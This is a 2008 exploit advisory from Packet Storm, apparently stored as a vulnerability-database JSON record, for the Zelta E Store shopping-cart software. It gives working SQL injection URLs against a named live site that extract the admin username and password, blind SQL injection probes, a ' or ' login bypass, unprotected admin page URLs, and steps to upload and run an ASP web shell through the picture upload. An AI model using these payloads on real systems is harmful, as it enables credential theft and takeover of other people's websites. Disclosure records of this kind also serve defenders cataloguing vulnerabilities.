Zelta E Store Multiple Vulnerabilities

{"hash": "a773f8350dc66bc189dc18bc280d5278e9180f901566d6ed81472eddc2e6043d", "sourceHref": "https://packetstormsecurity.com/files/download/73090/zelta-rfusql.txt", "title": "Zelta E Store Multiple Vulnerabilities", "id": "PACKETSTORM:73090", "published": "2008-12-17T00:00:00", "description": "", "modified": "2008-12-17T00:00:00", "sourceData": "`[~] Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns. \n[~] \n[~] script: http://www.zeltatrade.com/ \n[~] \n[~] ---------------------------------------------------------- \n[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com \n[~] \n[~] Date: 16/12/2008 \n[~] \n[~] Home: www.z0rlu.blogspot.com \n[~] \n[~] dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo \n[~] \n[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( \n[~] ----------------------------------------------------------- \n \nexp for demo: (R-SQL) \n \nuser: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin \n \npass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin \n \n \nexp for demo: (B-SQL) \n \nhttp://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true) \n \nhttp://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false) \n \n \nexp for demo: (auth bypass) \n \nhttp://joineazy.com/members/login.asp \n \nusername: trt-turk@hotmail.com \n \npass: ' or ' \n \n \nexp for demo: (admin bypass) \n \nhttp://joineazy.com/embadmin/admin_main.asp \n \nhttp://joineazy.com/embadmin/site_setup.asp \n \nhttp://joineazy.com/embadmin/main_baseimage.asp \n \n \nexp for demo: (RFU) \n \nfirs you register to site \n \nlogin to site and edit your pictures select your shell.asp \n \ngo your shell asp: \n \nhttp://joineazy.com/members/member_pictures/shell.asp \n \n[~]---------------------------------------------------------------------- \n[~] Greetz tO: str0ke \n[~] \n[~] yildirimordulari.org & darkc0de.com \n[~] \n[~]---------------------------------------------------------------------- \n \n`\n", "reporter": "ZoRLu", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "75fcbe74ffac30225e2cc33096af53fe"}, {"key": "modified", "hash": "7127e9da1ea01bb39a28f4583336443c"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "7127e9da1ea01bb39a28f4583336443c"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e5e87cf9669927ca4b16a90f3316b29a"}, {"key": "sourceData", "hash": "b9a85ab7d46299b02029a1dbfd23f674"}, {"key": "sourceHref", "hash": "d0b409322bfe2f7a447842834d403174"}, {"key": "title", "hash": "db02175ec6b019bdbf4d4671da350222"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/73090/Zelta-E-Store-Multiple-Vulnerabilities.html", "lastseen": "2016-11-03T10:16:43", "viewCount": 0, "enchantments": {"vulnersScore": 3.7}}